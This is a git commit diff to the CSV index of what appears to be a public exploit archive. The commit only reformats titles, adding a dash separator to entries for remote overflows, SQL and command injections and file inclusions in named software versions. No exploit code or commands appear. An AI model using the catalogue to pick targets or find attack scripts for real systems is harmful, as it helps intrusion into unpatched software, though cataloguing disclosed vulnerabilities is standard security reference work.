Updated 03_23_2014

2014-03-23 04:30:36 +00:00 · 2014-03-23 04:30:36 +00:00 · 2d7502a652
commit 2d7502a652
parent 81eda5a35c
25 changed files with 1597 additions and 725 deletions
--- a/files.csv
+++ b/files.csv
@ -1364,7 +1364,7 @@ id,file,description,date,author,platform,type,port
 1623,platforms/asp/webapps/1623.pl,"EzASPSite <= 2.0 RC3 (Scheme) Remote SQL Injection Exploit",2006-03-29,nukedx,asp,webapps,0
 1624,platforms/tru64/local/1624.pl,"Tru64 UNIX 5.0 (Rev. 910) rdist NLSPATH Buffer Overflow Exploit",2006-03-29,"Kevin Finisterre",tru64,local,0
 1625,platforms/tru64/local/1625.pl,"Tru64 UNIX 5.0 (Rev. 910) edauth NLSPATH Buffer Overflow Exploit",2006-03-29,"Kevin Finisterre",tru64,local,0
-1626,platforms/windows/remote/1626.pm,"PeerCast <= 0.1216 Remote Buffer Overflow Exploit (win32) (meta)",2006-03-30,"H D Moore",windows,remote,7144
+1626,platforms/windows/remote/1626.pm,"PeerCast <= 0.1216 - Remote Buffer Overflow Exploit (win32) (meta)",2006-03-30,"H D Moore",windows,remote,7144
 1627,platforms/php/webapps/1627.php,"Claroline <= 1.7.4 (scormExport.inc.php) Remote Code Execution Exploit",2006-03-30,rgod,php,webapps,0
 1628,platforms/windows/remote/1628.cpp,"MS Internet Explorer (createTextRang) Download Shellcoded Exploit (2)",2006-03-31,ATmaCA,windows,remote,0
 1629,platforms/php/webapps/1629.pl,"SQuery <= 4.5 (libpath) Remote File Inclusion Exploit",2006-04-01,uid0,php,webapps,0
@ -1408,7 +1408,7 @@ id,file,description,date,author,platform,type,port
 1677,platforms/cgi/webapps/1677.php,"SysInfo 1.21 (sysinfo.cgi) Remote Command Execution Exploit",2006-04-14,rgod,cgi,webapps,0
 1678,platforms/php/webapps/1678.php,"PHP Album <= 0.3.2.3 - Remote Command Execution Exploit",2006-04-15,rgod,php,webapps,0
 1679,platforms/novell/remote/1679.pm,"Novell Messenger Server 2.0 (Accept-Language) Remote Overflow Exploit",2006-04-15,"H D Moore",novell,remote,8300
-1680,platforms/cgi/webapps/1680.pm,"Symantec Sygate Management Server (login) SQL Injection Exploit",2006-04-15,Nicob,cgi,webapps,0
+1680,platforms/cgi/webapps/1680.pm,"Symantec Sygate Management Server - (login) SQL Injection Exploit",2006-04-15,Nicob,cgi,webapps,0
 1681,platforms/windows/remote/1681.pm,"Sybase EAServer 5.2 (WebConsole) Remote Stack Overflow Exploit",2006-04-15,N/A,windows,remote,8080
 1682,platforms/php/webapps/1682.php,"Fuju News 1.0 Authentication Bypass / Remote SQL Injection Exploit",2006-04-16,snatcher,php,webapps,0
 1683,platforms/php/webapps/1683.php,"Blackorpheus ClanMemberSkript 1.0 - Remote SQL Injection Exploit",2006-04-16,snatcher,php,webapps,0
@ -1647,7 +1647,7 @@ id,file,description,date,author,platform,type,port
 1937,platforms/multiple/dos/1937.html,"Opera 9 (long href) Remote Denial of Service Exploit",2006-06-21,N9,multiple,dos,0
 1938,platforms/php/webapps/1938.pl,"DataLife Engine <= 4.1 - Remote SQL Injection Exploit (perl)",2006-06-21,RusH,php,webapps,0
 1939,platforms/php/webapps/1939.php,"DataLife Engine <= 4.1 - Remote SQL Injection Exploit (php)",2006-06-21,RusH,php,webapps,0
-1940,platforms/windows/remote/1940.pm,"MS Windows RRAS Remote Stack Overflow Exploit (MS06-025)",2006-06-22,"H D Moore",windows,remote,445
+1940,platforms/windows/remote/1940.pm,"MS Windows RRAS - Remote Stack Overflow Exploit (MS06-025)",2006-06-22,"H D Moore",windows,remote,445
 1941,platforms/php/webapps/1941.php,"Mambo <= 4.6rc1 (Weblinks) Remote Blind SQL Injection Exploit (2)",2006-06-22,rgod,php,webapps,0
 1942,platforms/php/webapps/1942.txt,"ralf image gallery <= 0.7.4 - Multiple Vulnerabilities",2006-06-22,Aesthetico,php,webapps,0
 1943,platforms/php/webapps/1943.txt,"Harpia CMS <= 1.0.5 - Remote File Include Vulnerabilities",2006-06-22,Kw3[R]Ln,php,webapps,0
@ -4997,7 +4997,7 @@ id,file,description,date,author,platform,type,port
 5363,platforms/php/webapps/5363.txt,"Affiliate Directory (cat_id) Remote SQL Injection Vulnerbility",2008-04-04,t0pP8uZz,php,webapps,0
 5364,platforms/php/webapps/5364.txt,"PHP Photo Gallery 1.0 (photo_id) SQL Injection Vulnerability",2008-04-04,t0pP8uZz,php,webapps,0
 5365,platforms/php/webapps/5365.txt,"Blogator-script 0.95 (incl_page) Remote File Inclusion Vulnerability",2008-04-04,JIKO,php,webapps,0
-5366,platforms/solaris/remote/5366.rb,"Sun Solaris <= 10 rpc.ypupdated Remote Root Exploit (meta)",2008-04-04,I)ruid,solaris,remote,0
+5366,platforms/solaris/remote/5366.rb,"Sun Solaris <= 10 - rpc.ypupdated Remote Root Exploit (meta)",2008-04-04,I)ruid,solaris,remote,0
 5367,platforms/php/webapps/5367.pl,"PIGMy-SQL <= 1.4.1 (getdata.php id) Blind SQL Injection Exploit",2008-04-04,t0pP8uZz,php,webapps,0
 5368,platforms/php/webapps/5368.txt,"Blogator-script 0.95 (id_art) Remote SQL Injection Vulnerability",2008-04-04,"Virangar Security",php,webapps,0
 5369,platforms/php/webapps/5369.txt,"Dragoon 0.1 (lng) Local File Inclusion Vulnerability",2008-04-04,w0cker,php,webapps,0
@ -5382,7 +5382,7 @@ id,file,description,date,author,platform,type,port
 5759,platforms/php/webapps/5759.txt,"Joomla Component rapidrecipe Remote SQL injection Vulnerability",2008-06-08,His0k4,php,webapps,0
 5760,platforms/php/webapps/5760.pl,"Galatolo Web Manager <= 1.0 - Remote SQL Injection Exploit",2008-06-09,Stack,php,webapps,0
 5761,platforms/php/webapps/5761.pl,"iJoomla News Portal (Itemid) Remote SQL Injection Exploit",2008-06-09,"ilker Kandemir",php,webapps,0
-5762,platforms/php/webapps/5762.txt,"ProManager 0.73 (config.php) Local File Inclusion Vulnerability",2008-06-09,Stack,php,webapps,0
+5762,platforms/php/webapps/5762.txt,"ProManager 0.73 - (config.php) Local File Inclusion Vulnerability",2008-06-09,Stack,php,webapps,0
 5763,platforms/asp/webapps/5763.txt,"real estate web site 1.0 (sql/xss) Multiple Vulnerabilities",2008-06-09,JosS,asp,webapps,0
 5764,platforms/php/webapps/5764.txt,"telephone directory 2008 (sql/xss) Multiple Vulnerabilities",2008-06-09,"CWH Underground",php,webapps,0
 5765,platforms/asp/webapps/5765.txt,"ASPilot Pilot Cart 7.3 (article) Remote SQL Injection Vulnerability",2008-06-09,Bl@ckbe@rD,asp,webapps,0
@ -8316,7 +8316,7 @@ id,file,description,date,author,platform,type,port
 8817,platforms/php/webapps/8817.txt,"Evernew Free Joke Script 1.2 (cat_id) Remote SQL Injection Vulnerability",2009-05-27,taRentReXx,php,webapps,0
 8818,platforms/php/webapps/8818.txt,"AdPeeps 8.5d1 XSS and HTML Injection Vulnerabilities",2009-05-27,intern0t,php,webapps,0
 8819,platforms/php/webapps/8819.txt,"small pirate v-2.1 (xss/sql) Multiple Vulnerabilities",2009-05-29,YEnH4ckEr,php,webapps,0
-8820,platforms/php/webapps/8820.txt,"amember 3.1.7 (xss/sql/hi) Multiple Vulnerabilities",2009-05-29,intern0t,php,webapps,0
+8820,platforms/php/webapps/8820.txt,"amember 3.1.7 - (xss/sql/hi) Multiple Vulnerabilities",2009-05-29,intern0t,php,webapps,0
 8821,platforms/php/webapps/8821.txt,"Joomla Component JVideo 0.3.x SQL Injection Vulnerability",2009-05-29,"Chip d3 bi0s",php,webapps,0
 8822,platforms/multiple/dos/8822.txt,"Mozilla Firefox 3.0.10 (KEYGEN) Remote Denial of Service Exploit",2009-05-29,"Thierry Zoller",multiple,dos,0
 8823,platforms/php/webapps/8823.txt,"Webboard <= 2.90 beta - Remote File Disclosure Vulnerability",2009-05-29,MrDoug,php,webapps,0
@ -8740,7 +8740,7 @@ id,file,description,date,author,platform,type,port
 9265,platforms/linux/dos/9265.c,"ISC DHCP dhclient < 3.1.2p1 Remote Buffer Overflow PoC",2009-07-27,"Jon Oberheide",linux,dos,0
 9266,platforms/php/webapps/9266.txt,"iwiccle 1.01 (lfi/sql) Multiple Vulnerabilities",2009-07-27,SirGod,php,webapps,0
 9267,platforms/php/webapps/9267.txt,"VS PANEL 7.5.5 (Cat_ID) SQL Injection Vulnerability (patched?)",2009-07-27,octopos,php,webapps,0
-9268,platforms/hardware/dos/9268.rb,"Cisco WLC 4402 Basic Auth Remote Denial of Service (meta)",2009-07-27,"Christoph Bott",hardware,dos,0
+9268,platforms/hardware/dos/9268.rb,"Cisco WLC 4402 - Basic Auth Remote Denial of Service (meta)",2009-07-27,"Christoph Bott",hardware,dos,0
 9269,platforms/php/webapps/9269.txt,"PHP Paid 4 Mail Script (home.php page) Remote File Inclusion Vuln",2009-07-27,int_main();,php,webapps,0
 9270,platforms/php/webapps/9270.txt,"Super Mod System 3.0 - (s) SQL Injection Vulnerability",2009-07-27,MizoZ,php,webapps,0
 9271,platforms/php/webapps/9271.txt,"Inout Adserver (id) Remote SQL injection Vulnerability",2009-07-27,boom3rang,php,webapps,0
@ -9268,7 +9268,7 @@ id,file,description,date,author,platform,type,port
 9882,platforms/windows/local/9882.txt,"Firefox 3.5.3 - Local Download Manager Temp File Creation",2009-10-28,"Jeremy Brown",windows,local,0
 9884,platforms/windows/local/9884.txt,"GPG2/Kleopatra 2.0.11 malformed certificate PoC",2009-10-21,Dr_IDE,windows,local,0
 9885,platforms/windows/webapps/9885.txt,"httpdx <= 1.4.6b source disclosure",2009-10-21,Dr_IDE,windows,webapps,0
-9886,platforms/windows/remote/9886.txt,"httpdx 1.4 h_handlepeer BoF",2009-10-16,"Pankaj Kohli, Trancer",windows,remote,0
+9886,platforms/windows/remote/9886.txt,"httpdx 1.4 - h_handlepeer BoF",2009-10-16,"Pankaj Kohli, Trancer",windows,remote,0
 9887,platforms/jsp/webapps/9887.txt,"jetty 6.x - 7.x xss, information disclosure, injection",2009-10-26,"Antonion Parata",jsp,webapps,0
 9888,platforms/php/webapps/9888.txt,"Joomla Ajax Chat 1.0 remote file inclusion",2009-10-19,kaMtiEz,php,webapps,0
 9889,platforms/php/webapps/9889.txt,"Joomla Book Library 1.0 file inclusion",2009-10-19,kaMtiEz,php,webapps,0
@ -9290,50 +9290,50 @@ id,file,description,date,author,platform,type,port
 9906,platforms/php/webapps/9906.rb,"Mambo 4.6.4 Cache Lite Output Remote File Inclusion",2008-06-14,MC,php,webapps,0
 9907,platforms/cgi/webapps/9907.rb,"The Matt Wright guestbook.pl <= 2.3.1 - Server Side Include Vulnerability",1999-11-05,patrick,cgi,webapps,0
 9908,platforms/php/webapps/9908.rb,"BASE <= 1.2.4 base_qry_common.php Remote File Inclusion",2008-06-14,MC,php,webapps,0
-9909,platforms/cgi/webapps/9909.rb,"AWStats 6.4-6.5 AllowToUpdateStatsFromBrowser Command Injection",2006-05-04,patrick,cgi,webapps,0
+9909,platforms/cgi/webapps/9909.rb,"AWStats 6.4-6.5 - AllowToUpdateStatsFromBrowser Command Injection",2006-05-04,patrick,cgi,webapps,0
 9910,platforms/php/webapps/9910.rb,"Dogfood CRM 2.0.10 spell.php Command Injection",2009-03-03,LSO,php,webapps,0
 9911,platforms/php/webapps/9911.rb,"Cacti 0.8.6-d graph_view.php Command Injection",2005-01-15,"David Maciejak",php,webapps,0
-9912,platforms/cgi/webapps/9912.rb,"AWStats 6.2-6.1 configdir Command Injection",2005-01-15,"Matteo Cantoni",cgi,webapps,0
+9912,platforms/cgi/webapps/9912.rb,"AWStats 6.2-6.1 - configdir Command Injection",2005-01-15,"Matteo Cantoni",cgi,webapps,0
-9913,platforms/multiple/remote/9913.rb,"ClamAV Milter <= 0.92.2 Blackhole-Mode (sendmail) Code Execution",2007-08-24,patrick,multiple,remote,25
+9913,platforms/multiple/remote/9913.rb,"ClamAV Milter <= 0.92.2 - Blackhole-Mode (sendmail) Code Execution",2007-08-24,patrick,multiple,remote,25
 9914,platforms/unix/remote/9914.rb,"SpamAssassin spamd <= 3.1.3 - Command Injection",2006-06-06,patrick,unix,remote,783
-9915,platforms/multiple/remote/9915.rb,"DistCC Daemon Command Execution",2002-02-01,"H D Moore",multiple,remote,3632
+9915,platforms/multiple/remote/9915.rb,"DistCC Daemon - Command Execution",2002-02-01,"H D Moore",multiple,remote,3632
 9916,platforms/multiple/webapps/9916.rb,"ContentKeeper Web Appliance < 125.10 Command Execution",2009-02-25,patrick,multiple,webapps,0
-9917,platforms/solaris/remote/9917.rb,"Solaris in.telnetd TTYPROMPT Buffer Overflow",2002-01-18,MC,solaris,remote,23
+9917,platforms/solaris/remote/9917.rb,"Solaris in.telnetd TTYPROMPT - Buffer Overflow",2002-01-18,MC,solaris,remote,23
-9918,platforms/solaris/remote/9918.rb,"Solaris 10, 11 Telnet Remote Authentication Bypass",2007-02-12,MC,solaris,remote,23
+9918,platforms/solaris/remote/9918.rb,"Solaris 10, 11 Telnet - Remote Authentication Bypass",2007-02-12,MC,solaris,remote,23
-9920,platforms/solaris/remote/9920.rb,"Solaris sadmind adm_build_path Buffer Overflow",2008-10-14,"Adriano Lima",solaris,remote,111
+9920,platforms/solaris/remote/9920.rb,"Solaris sadmind adm_build_path - Buffer Overflow",2008-10-14,"Adriano Lima",solaris,remote,111
-9921,platforms/solaris/remote/9921.rb,"Solaris <= 8.0 LPD Command Execution",2001-08-31,"H D Moore",solaris,remote,515
+9921,platforms/solaris/remote/9921.rb,"Solaris <= 8.0 - LPD Command Execution",2001-08-31,"H D Moore",solaris,remote,515
 9922,platforms/php/webapps/9922.txt,"Oscailt CMS 3.3 - Local File Inclusion",2009-10-28,s4r4d0,php,webapps,0
-9923,platforms/solaris/remote/9923.rb,"Solaris 8 dtspcd Heap Overflow",2002-06-10,noir,solaris,remote,6112
+9923,platforms/solaris/remote/9923.rb,"Solaris 8 dtspcd - Heap Overflow",2002-06-10,noir,solaris,remote,6112
-9924,platforms/osx/remote/9924.rb,"Samba 2.2.0 - 2.2.8 trans2open Overflow (OS X)",2003-04-07,"H D Moore",osx,remote,139
+9924,platforms/osx/remote/9924.rb,"Samba 2.2.0 - 2.2.8 - trans2open Overflow (OS X)",2003-04-07,"H D Moore",osx,remote,139
 9925,platforms/osx/remote/9925.rb,"Apple Quicktime RTSP 10.4.0 - 10.5.0 Content-Type Overflow (OS X)",2009-10-28,N/A,osx,remote,0
 9926,platforms/php/webapps/9926.rb,"Joomla 1.5.12 tinybrowser Remote File Upload/Execute Vulnerability",2009-07-22,spinbad,php,webapps,0
 9927,platforms/osx/remote/9927.rb,"mDNSResponder 10.4.0, 10.4.8 UPnP Location Overflow (OS X)",2009-10-28,N/A,osx,remote,0
-9928,platforms/osx/remote/9928.rb,"WebSTAR FTP Server <= 5.3.2 USER Overflow (OS X)",2004-07-13,ddz,osx,remote,21
+9928,platforms/osx/remote/9928.rb,"WebSTAR FTP Server <= 5.3.2 - USER Overflow (OS X)",2004-07-13,ddz,osx,remote,21
-9929,platforms/osx/remote/9929.rb,"Mail.App 10.5.0 Image Attachment Command Execution (OS X)",2006-03-01,"H D Moore",osx,remote,25
+9929,platforms/osx/remote/9929.rb,"Mail.App 10.5.0 - Image Attachment Command Execution (OS X)",2006-03-01,"H D Moore",osx,remote,25
-9930,platforms/osx/remote/9930.rb,"Arkeia Backup Client <= 5.3.3 Type 77 Overflow (OS X)",2005-02-18,"H D Moore",osx,remote,0
+9930,platforms/osx/remote/9930.rb,"Arkeia Backup Client <= 5.3.3 - Type 77 Overflow (OS X)",2005-02-18,"H D Moore",osx,remote,0
-9931,platforms/osx/remote/9931.rb,"AppleFileServer 10.3.3 LoginEXT PathName Overflow (OS X)",2004-03-03,"H D Moore",osx,remote,548
+9931,platforms/osx/remote/9931.rb,"AppleFileServer 10.3.3 - LoginEXT PathName Overflow (OS X)",2004-03-03,"H D Moore",osx,remote,548
-9932,platforms/novell/remote/9932.rb,"Novell NetWare 6.5 SP2-SP7 LSASS CIFS.NLM Overflow",2007-01-21,toto,novell,remote,0
+9932,platforms/novell/remote/9932.rb,"Novell NetWare 6.5 SP2-SP7 - LSASS CIFS.NLM Overflow",2007-01-21,toto,novell,remote,0
 9933,platforms/php/webapps/9933.txt,"PHP168 6.0 Command Execution",2009-10-28,"Securitylab Security Research",php,webapps,0
-9934,platforms/multiple/remote/9934.rb,"Wyse Rapport Hagent Fake Hserver Command Execution",2009-07-10,kf,multiple,remote,0
+9934,platforms/multiple/remote/9934.rb,"Wyse Rapport Hagent Fake Hserver - Command Execution",2009-07-10,kf,multiple,remote,0
 9935,platforms/multiple/remote/9935.rb,"Subversion 1.0.2 - Date Overflow",2004-05-19,spoonm,multiple,remote,3690
-9936,platforms/linux/remote/9936.rb,"Samba 2.2.x nttrans Overflow",2003-04-07,"H D Moore",linux,remote,139
+9936,platforms/linux/remote/9936.rb,"Samba 2.2.x - nttrans Overflow",2003-04-07,"H D Moore",linux,remote,139
 9937,platforms/multiple/remote/9937.rb,"RealServer 7-9 Describe Buffer Overflow",2002-12-20,"H D Moore",multiple,remote,0
-9939,platforms/php/remote/9939.rb,"PHP < 4.5.0 unserialize Overflow",2007-03-01,sesser,php,remote,0
+9939,platforms/php/remote/9939.rb,"PHP < 4.5.0 - unserialize Overflow",2007-03-01,sesser,php,remote,0
-9940,platforms/linux/remote/9940.rb,"ntpd 4.0.99j-k readvar Buffer Overflow",2001-04-04,patrick,linux,remote,123
+9940,platforms/linux/remote/9940.rb,"ntpd 4.0.99j-k readvar - Buffer Overflow",2001-04-04,patrick,linux,remote,123
-9941,platforms/multiple/remote/9941.rb,"Veritas NetBackup Remote Command Execution",2004-10-21,patrick,multiple,remote,0
+9941,platforms/multiple/remote/9941.rb,"Veritas NetBackup - Remote Command Execution",2004-10-21,patrick,multiple,remote,0
-9942,platforms/multiple/remote/9942.rb,"HP OpenView OmniBack II A.03.50 Command Executino",2001-02-28,"H D Moore",multiple,remote,5555
+9942,platforms/multiple/remote/9942.rb,"HP OpenView OmniBack II A.03.50 - Command Executino",2001-02-28,"H D Moore",multiple,remote,5555
-9943,platforms/multiple/remote/9943.rb,"Apple Quicktime for Java 7 Memory Access",2007-04-23,"H D Moore",multiple,remote,0
+9943,platforms/multiple/remote/9943.rb,"Apple Quicktime for Java 7 - Memory Access",2007-04-23,"H D Moore",multiple,remote,0
-9944,platforms/multiple/remote/9944.rb,"Opera 9.50, 9.61 historysearch Command Execution",2008-10-23,egypt,multiple,remote,0
+9944,platforms/multiple/remote/9944.rb,"Opera 9.50, 9.61 historysearch - Command Execution",2008-10-23,egypt,multiple,remote,0
 9945,platforms/multiple/remote/9945.rb,"Opera <= 9.10 Configuration Overwrite",2007-03-05,egypt,multiple,remote,0
-9946,platforms/multiple/remote/9946.rb,"Mozilla Suite/Firefox < 1.5.0.5 Navigator Object Code Execution",2006-07-25,"H D Moore",multiple,remote,0
+9946,platforms/multiple/remote/9946.rb,"Mozilla Suite/Firefox < 1.5.0.5 - Navigator Object Code Execution",2006-07-25,"H D Moore",multiple,remote,0
-9947,platforms/windows/remote/9947.rb,"Mozilla Suite/Firefox < 1.0.5 compareTo Code Execution",2005-07-13,"H D Moore",windows,remote,0
+9947,platforms/windows/remote/9947.rb,"Mozilla Suite/Firefox < 1.0.5 - compareTo Code Execution",2005-07-13,"H D Moore",windows,remote,0
 9948,platforms/multiple/remote/9948.rb,"Sun Java Runtime and Development Kit <= 6 Update 10 - Calendar Deserialization Exploit",2008-12-03,sf,multiple,remote,0
-9949,platforms/multiple/remote/9949.rb,"Firefox 3.5 escape Memory Corruption Exploit",2006-07-14,"H D Moore",multiple,remote,0
+9949,platforms/multiple/remote/9949.rb,"Firefox 3.5 - escape Memory Corruption Exploit",2006-07-14,"H D Moore",multiple,remote,0
-9950,platforms/linux/remote/9950.rb,"Samba 3.0.21-3.0.24 LSA trans names Heap Overflow",2007-05-14,"Adriano Lima",linux,remote,0
+9950,platforms/linux/remote/9950.rb,"Samba 3.0.21-3.0.24 - LSA trans names Heap Overflow",2007-05-14,"Adriano Lima",linux,remote,0
-9951,platforms/multiple/remote/9951.rb,"Squid 2.5.x, 3.x NTLM Buffer Overflow",2004-06-08,skape,multiple,remote,3129
+9951,platforms/multiple/remote/9951.rb,"Squid 2.5.x, 3.x - NTLM Buffer Overflow",2004-06-08,skape,multiple,remote,3129
-9952,platforms/linux/remote/9952.rb,"Poptop < 1.1.3-b3 and 1.1.3-20030409 Negative Read Overflow",2003-04-09,spoonm,linux,remote,1723
+9952,platforms/linux/remote/9952.rb,"Poptop < 1.1.3-b3 and 1.1.3-20030409 - Negative Read Overflow",2003-04-09,spoonm,linux,remote,1723
-9953,platforms/linux/remote/9953.rb,"MySQL <= 6.0 yaSSL <= 1.7.5 Hello Message Buffer Overflow",2008-01-04,MC,linux,remote,3306
+9953,platforms/linux/remote/9953.rb,"MySQL <= 6.0 yaSSL <= 1.7.5 - Hello Message Buffer Overflow",2008-01-04,MC,linux,remote,3306
-9954,platforms/linux/remote/9954.rb,"Borland InterBase 2007 PWD_db_aliased Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050
+9954,platforms/linux/remote/9954.rb,"Borland InterBase 2007 - PWD_db_aliased Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050
 9955,platforms/hardware/local/9955.txt,"Overland Guardian OS 5.1.041 privilege escalation",2009-10-20,trompele,hardware,local,0
 9956,platforms/hardware/dos/9956.txt,"Palm Pre WebOS 1.1 DoS",2009-10-14,"Townsend Harris",hardware,dos,0
 9957,platforms/windows/remote/9957.txt,"Pegasus Mail Client 4.51 PoC BoF",2009-10-23,"Francis Provencher",windows,remote,0
@ -9383,7 +9383,7 @@ id,file,description,date,author,platform,type,port
 10006,platforms/php/webapps/10006.txt,"DreamPoll 3.1 Vulnerabilities",2009-10-08,"Mark from infosecstuff",php,webapps,0
 10007,platforms/windows/remote/10007.html,"EasyMail Objects EMSMTP.DLL 6.0.1 ActiveX Control Remote Buffer Overflow Vulnerability",2009-11-12,"Will Dormann",windows,remote,0
 10008,platforms/windows/remote/10008.txt,"EMC Captiva QuickScan Pro 4.6 sp1 and EMC Documentum ApllicationXtender Desktop 5.4",2009-09-30,pyrokinesis,windows,remote,0
-10009,platforms/windows/local/10009.txt,"Free Download Manager Torrent File Parsing Multiple Remote Buffer Overflow Vulnerabilities",2009-11-11,"Carsten Eiram",windows,local,0
+10009,platforms/windows/local/10009.txt,"Free Download Manager Torrent File Parsing - Multiple Remote Buffer Overflow Vulnerabilities",2009-11-11,"Carsten Eiram",windows,local,0
 10010,platforms/windows/local/10010.txt,"Free WMA MP3 Converter 1.1 - (.wav) Local Buffer Overflow",2009-10-09,KriPpLer,windows,local,0
 10011,platforms/hardware/remote/10011.txt,"HP LaserJet printers - Multiple Stored XSS Vulnerabilities",2009-10-07,"Digital Security Research Group",hardware,remote,80
 10012,platforms/multiple/webapps/10012.py,"html2ps 'include file' Server Side Include Directive Directory Traversal Vulnerability",2009-09-25,epiphant,multiple,webapps,0
@ -9393,25 +9393,25 @@ id,file,description,date,author,platform,type,port
 10016,platforms/php/webapps/10016.pl,"JForJoomla JReservation Joomla! Component 1.5 - 'pid' Parameter SQL Injection Vulnerability",2009-11-10,"Chip d3 bi0s",php,webapps,0
 10017,platforms/linux/dos/10017.c,"Linux Kernel 'fput()' NULL Pointer Dereference Local Denial of Service Vulnerabilty",2009-11-09,"David Howells",linux,dos,0
 10018,platforms/linux/local/10018.sh,"Linux Kernel 'pipe.c' - Local Privilege Escalation Vulnerability",2009-11-12,"Earl Chew",linux,local,0
-10019,platforms/linux/remote/10019.rb,"Borland Interbase 2007, 2007 SP2 open_marker_file Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050
+10019,platforms/linux/remote/10019.rb,"Borland Interbase 2007, 2007 SP2 - open_marker_file Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050
-10020,platforms/linux/remote/10020.rb,"Borland InterBase 2007, 2007 sp2 jrd8_create_database Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050
+10020,platforms/linux/remote/10020.rb,"Borland InterBase 2007, 2007 sp2 - jrd8_create_database Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050
-10021,platforms/linux/remote/10021.rb,"Borland Interbase 2007, 2007SP2 INET_connect Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050
+10021,platforms/linux/remote/10021.rb,"Borland Interbase 2007, 2007 SP2 - INET_connect Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050
 10022,platforms/linux/local/10022.c,"Linux Kernel 'unix_stream_connect()' Local Denial of Service Vulnerability",2009-11-10,"Tomoki Sekiyama",linux,local,0
-10023,platforms/linux/remote/10023.rb,"Salim Gasmi GLD 1.0 - 1.4 Postfix Greylisting Buffer Overflow",2005-04-12,patrick,linux,remote,2525
+10023,platforms/linux/remote/10023.rb,"Salim Gasmi GLD 1.0 - 1.4 - Postfix Greylisting Buffer Overflow",2005-04-12,patrick,linux,remote,2525
-10024,platforms/linux/remote/10024.rb,"Madwifi < 0.9.2.1 SIOCGIWSCAN Buffer Overflow",2006-12-08,"Julien Tinnes",linux,remote,0
+10024,platforms/linux/remote/10024.rb,"Madwifi < 0.9.2.1 - SIOCGIWSCAN Buffer Overflow",2006-12-08,"Julien Tinnes",linux,remote,0
-10025,platforms/linux/remote/10025.rb,"University of Washington imap LSUB Buffer Overflow",2000-04-16,patrick,linux,remote,143
+10025,platforms/linux/remote/10025.rb,"University of Washington - imap LSUB Buffer Overflow",2000-04-16,patrick,linux,remote,143
-10026,platforms/linux/remote/10026.rb,"Snort 2.4.0 - 2.4.3 Back Orifice Pre-Preprocessor Remote Exploit",2005-10-18,"KaiJern Lau",linux,remote,9080
+10026,platforms/linux/remote/10026.rb,"Snort 2.4.0 - 2.4.3 - Back Orifice Pre-Preprocessor Remote Exploit",2005-10-18,"KaiJern Lau",linux,remote,9080
 10027,platforms/linux/remote/10027.rb,"PeerCast <= 0.1216",2006-03-08,MC,linux,remote,7144
 10028,platforms/cgi/remote/10028.rb,"Linksys WRT54G < 4.20.7 , WRT54GS < 1.05.2 apply.cgi Buffer Overflow",2005-09-13,"Raphael Rigo",cgi,remote,80
-10029,platforms/linux/remote/10029.rb,"Berlios GPSD 1.91-1 - 2.7-2 Format String Vulnerability",2005-05-25,"Yann Senotier",linux,remote,2947
+10029,platforms/linux/remote/10029.rb,"Berlios GPSD 1.91-1 - 2.7-2 - Format String Vulnerability",2005-05-25,"Yann Senotier",linux,remote,2947
 10030,platforms/linux/remote/10030.rb,"DD-WRT HTTP v24-SP1 - Command Injection Vulnerability",2009-07-20,"H D Moore",linux,remote,80
-10031,platforms/cgi/webapps/10031.rb,"Alcatel-Lucent OmniPCX Enterprise Communication Server <= 7.1 masterCGI Command Injection",2007-09-17,patrick,cgi,webapps,443
+10031,platforms/cgi/webapps/10031.rb,"Alcatel-Lucent OmniPCX Enterprise Communication Server <= 7.1 - masterCGI Command Injection",2007-09-17,patrick,cgi,webapps,443
-10032,platforms/linux/remote/10032.rb,"Unreal Tournament 2004 ""Secure"" Overflow",2004-07-18,onetwo,linux,remote,7787
+10032,platforms/linux/remote/10032.rb,"Unreal Tournament 2004 - ""Secure"" Overflow",2004-07-18,onetwo,linux,remote,7787
-10033,platforms/irix/remote/10033.rb,"Irix LPD tagprinter Command Execution",2001-09-01,"H D Moore",irix,remote,515
+10033,platforms/irix/remote/10033.rb,"Irix LPD tagprinter - Command Execution",2001-09-01,"H D Moore",irix,remote,515
-10034,platforms/hp-ux/remote/10034.rb,"HP-UX LPD 10.20, 11.00, 11.11 Command Execution",2002-08-28,"H D Moore",hp-ux,remote,515
+10034,platforms/hp-ux/remote/10034.rb,"HP-UX LPD 10.20, 11.00, 11.11 - Command Execution",2002-08-28,"H D Moore",hp-ux,remote,515
-10035,platforms/bsd/remote/10035.rb,"Xtacacsd <= 4.1.2 report Buffer Overflow",2008-01-08,MC,bsd,remote,49
+10035,platforms/bsd/remote/10035.rb,"Xtacacsd <= 4.1.2 - report Buffer Overflow",2008-01-08,MC,bsd,remote,49
 10036,platforms/solaris/remote/10036.rb,"System V Derived /bin/login Extraneous Arguments Buffer Overflow (modem based)",2001-12-12,I)ruid,solaris,remote,0
-10037,platforms/cgi/webapps/10037.rb,"Mercantec SoftCart 4.00b CGI Overflow",2004-08-19,skape,cgi,webapps,0
+10037,platforms/cgi/webapps/10037.rb,"Mercantec SoftCart 4.00b - CGI Overflow",2004-08-19,skape,cgi,webapps,0
 10038,platforms/linux/local/10038.txt,"proc File Descriptors Directory Permissions bypass",2009-10-23,"Pavel Machek",linux,local,0
 10039,platforms/windows/local/10039.txt,"GPG4Win GNU Privacy Assistant PoC",2009-10-23,Dr_IDE,windows,local,0
 10042,platforms/php/webapps/10042.txt,"Achievo <= 1.3.4 - SQL Injection",2009-10-14,"Ryan Dewhurst",php,webapps,0
@ -9436,7 +9436,7 @@ id,file,description,date,author,platform,type,port
 10062,platforms/windows/dos/10062.py,"Novell eDirectory 883ftf3 nldap module Denial of Service",2009-11-16,ryujin,windows,dos,389
 10064,platforms/php/webapps/10064.txt,"Joomla CB Resume Builder - SQL Injection",2009-10-05,kaMtiEz,php,webapps,0
 10067,platforms/php/webapps/10067.txt,"Joomla Soundset 1.0 - SQL Injection",2009-10-05,kaMtiEz,php,webapps,0
-10068,platforms/windows/dos/10068.rb,"Microsoft Windows 2000-2008 Embedded OpenType Font Engine Remote Code Execution",2009-11-12,"H D Moore",windows,dos,0
+10068,platforms/windows/dos/10068.rb,"Microsoft Windows 2000-2008 - Embedded OpenType Font Engine Remote Code Execution",2009-11-12,"H D Moore",windows,dos,0
